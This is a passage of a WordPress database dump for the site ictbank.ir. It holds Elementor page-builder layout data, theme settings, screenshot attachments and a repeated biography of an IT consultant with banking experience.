\\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_title_color\":\"globals\\/colors?id=text\",\"classic_meta_color\":\"globals\\/colors?id=accent\",\"classic_excerpt_color\":\"globals\\/colors?id=accent\",\"classic_read_more_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(2760,51,'_edit_last','2'),
(2761,51,'content_layout','default'),
(2762,51,'page_layout','default'),
(2763,51,'page_sidebar_style','default'),
(2764,51,'show_content_top_margin','default'),
(2765,51,'page_show_goto_top_btn','default'),
(2766,51,'page_goto_top_alignment','default'),
(2767,51,'aux_title_bar_show','default'),
(2768,51,'aux_title_bar_preset','default'),
(2769,51,'aux_title_bar_enable_customize','0'),
(2770,51,'aux_title_bar_content_width_type','boxed'),
(2771,51,'aux_title_bar_content_section_height','auto'),
(2772,51,'aux_title_bar_title_show','1'),
(2773,51,'aux_title_bar_heading_bordered','0'),
(2774,51,'aux_title_bar_heading_boxed','0'),
(2775,51,'aux_title_bar_meta_enabled','0'),
(2776,51,'aux_title_bar_bread_enabled','1'),
(2777,51,'aux_title_bar_bread_bordered','0'),
(2778,51,'aux_title_bar_text_align','left'),
(2779,51,'aux_title_bar_overlay_pattern','none'),
(2780,51,'aux_title_bar_overlay_pattern_opacity','0.15'),
(2781,51,'aux_title_bar_color_style','dark'),
(2782,51,'aux_title_bar_bg_show','0'),
(2783,51,'aux_title_bar_bg_parallax','0'),
(2784,51,'aux_title_bar_bg_size','cover'),
(2785,51,'aux_custom_bg_show','0'),
(2786,51,'aux_custom_bg_repeat','repeat'),
(2787,51,'aux_custom_bg_attach','scroll'),
(2788,51,'aux_custom_bg_position','left top'),
(2789,51,'aux_custom_bg_size','auto'),
(2790,51,'top_slider_id','none'),
(2791,51,'aux_metafields_custom_styles',''),
(2792,651,'_elementor_edit_mode','builder'),
(2793,651,'_elementor_template_type','wp-page'),
(2794,651,'_elementor_version','3.12.1'),
(2795,651,'_wp_page_template','default'),
(2796,651,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[],\"isInner\":true}],\"isInner\":false}]'),
(2798,652,'_elementor_edit_mode','builder'),
(2799,652,'_elementor_template_type','wp-page'),
(2800,652,'_elementor_version','3.12.1'),
(2801,652,'_wp_page_template','default'),
(2802,652,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[],\"isInner\":true}],\"isInner\":false}]'),
(2804,653,'_elementor_edit_mode','builder'),
(2805,653,'_elementor_template_type','wp-page'),
(2806,653,'_elementor_version','3.12.1'),
(2807,653,'_wp_page_template','default'),
(2808,653,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[],\"isInner\":true}],\"isInner\":false}]'),
(2816,655,'_elementor_edit_mode','builder'),
(2817,655,'_elementor_template_type','wp-page'),
(2818,655,'_elementor_version','3.12.1'),
(2819,655,'_wp_page_template','default'),
(2820,655,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[],\"isInner\":true}],\"isInner\":false}]'),
(2822,656,'_elementor_edit_mode','builder'),
(2823,656,'_elementor_template_type','wp-page'),
(2824,656,'_elementor_version','3.12.1'),
(2825,656,'_wp_page_template','default'),
(2826,656,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[],\"isInner\":true}],\"isInner\":false}]'),
(2828,657,'_elementor_edit_mode','builder'),
(2829,657,'_elementor_template_type','wp-page'),
(2830,657,'_elementor_version','3.12.1'),
(2831,657,'_wp_page_template','default'),
(2832,657,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[],\"isInner\":true}],\"isInner\":false}]'),
(2845,659,'_elementor_edit_mode','builder'),
(2846,659,'_elementor_template_type','wp-page'),
(2847,659,'_elementor_version','3.12.1'),
(2848,659,'_wp_page_template','default'),
(2849,659,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[],\"isInner\":true}],\"isInner\":false}]'),
(2851,660,'_elementor_edit_mode','builder'),
(2852,660,'_elementor_template_type','wp-page'),
(2853,660,'_elementor_version','3.12.1'),
(2854,660,'_wp_page_template','default'),
(2855,660,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[],\"isInner\":true}],\"isInner\":false}]'),
(2857,661,'_elementor_edit_mode','builder'),
(2858,661,'_elementor_template_type','wp-page'),
(2859,661,'_elementor_version','3.12.1'),
(2860,661,'_wp_page_template','default'),
(2861,661,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(2863,647,'_elementor_pro_version','3.28.3'),
(2870,663,'_elementor_is_screenshot','1'),
(2871,663,'_wp_attached_file','elementor/screenshots/Elementor-post-screenshot_358_2023-04-19-06-47-26_76a29a2e.png'),
(2872,358,'_elementor_screenshot','a:2:{s:2:\"id\";i:663;s:3:\"url\";s:126:\"http://ictbank.ir/blog/wp-content/uploads/elementor/screenshots/Elementor-post-screenshot_358_2023-04-19-06-47-26_76a29a2e.png\";}'),
(2877,386,'_elementor_screenshot','a:2:{s:2:\"id\";i:665;s:3:\"url\";s:126:\"http://ictbank.ir/blog/wp-content/uploads/elementor/screenshots/Elementor-post-screenshot_386_2023-04-19-06-47-36_7d0c48b2.png\";}'),
(2878,665,'_elementor_is_screenshot','1'),
(2879,665,'_wp_attached_file','elementor/screenshots/Elementor-post-screenshot_386_2023-04-19-06-47-36_7d0c48b2.png'),
(2882,666,'_elementor_is_screenshot','1'),
(2883,666,'_wp_attached_file','elementor/screenshots/Elementor-post-screenshot_387_2023-04-19-06-47-44_f93a5e6.png'),
(2884,387,'_elementor_screenshot','a:2:{s:2:\"id\";i:666;s:3:\"url\";s:125:\"http://ictbank.ir/blog/wp-content/uploads/elementor/screenshots/Elementor-post-screenshot_387_2023-04-19-06-47-44_f93a5e6.png\";}'),
(2887,345,'_elementor_pro_version','3.13.2'),
(2890,667,'_elementor_edit_mode','builder'),
(2891,667,'_elementor_template_type','kit'),
(2892,667,'_elementor_version','3.12.1'),
(2893,667,'_wp_page_template','default'),
(2894,667,'_elementor_page_settings','a:14:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#FFFFFF\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#54595F\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#7A7A7A\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#61CE70\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:11:\"Roboto Slab\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:10:\"ictbank.ir\";s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:7:\"#000000\";s:25:\"mobile_browser_background\";s:7:\"#FF0000\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:15:\"activeItemIndex\";i:1;}'),
(2895,667,'_elementor_data','[]'),
(2897,667,'_elementor_pro_version','3.11.7'),
(2910,670,'_elementor_edit_mode','builder'),
(2911,670,'_elementor_template_type','wp-page'),
(2912,670,'_elementor_version','3.12.1'),
(2913,670,'_wp_page_template','default'),
(2914,670,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false}]'),
(2916,670,'_elementor_pro_version','3.11.7'),
(2917,671,'_elementor_edit_mode','builder'),
(2918,671,'_elementor_template_type','wp-page'),
(2919,671,'_elementor_version','3.12.1'),
(2920,671,'_wp_page_template','default'),
(2921,671,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\